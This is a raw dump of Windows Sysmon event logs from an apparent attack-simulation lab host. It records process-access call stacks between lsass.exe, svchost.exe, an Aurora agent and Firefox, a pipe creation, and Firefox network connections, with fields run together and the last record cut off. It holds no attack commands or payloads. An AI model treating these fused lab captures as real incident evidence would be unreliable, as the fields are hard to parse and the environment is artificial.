Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.054{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.054{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.054{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.054{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.054{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.054{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.054{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.053{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.053{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.053{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.053{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.053{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.053{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.053{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.044{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.044{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.044{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.044{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000043422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:59.044{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.2.98790250C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.944{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.879{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5233D0C11AD1B211418C7D435170AED,SHA256=44135E851FB5847F643775132F149CFC5C600C133EEE2FDD41411AA5562FF95D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000043879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.229{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56358-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000043878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.224{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56359-false72.21.91.29-80http 354300x800000000000000043877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.199{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56357-false35.241.9.150150.9.241.35.bc.googleusercontent.com443https 354300x800000000000000043876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.193{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56356-false35.244.181.201201.181.244.35.bc.googleusercontent.com443https 354300x800000000000000043875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.187{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56355-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000043874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.187{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56851- 354300x800000000000000043873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.179{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60951- 354300x800000000000000043872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.080{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56353-false52.34.149.78ec2-52-34-149-78.us-west-2.compute.amazonaws.com443https 354300x800000000000000043871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.858{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56351-false34.160.144.191191.144.160.34.bc.googleusercontent.com443https 354300x800000000000000043870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.857{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56352-false23.33.22.142a23-33-22-142.deploy.static.akamaitechnologies.com80http 354300x800000000000000043869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.847{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60436- 354300x800000000000000043868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.845{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla 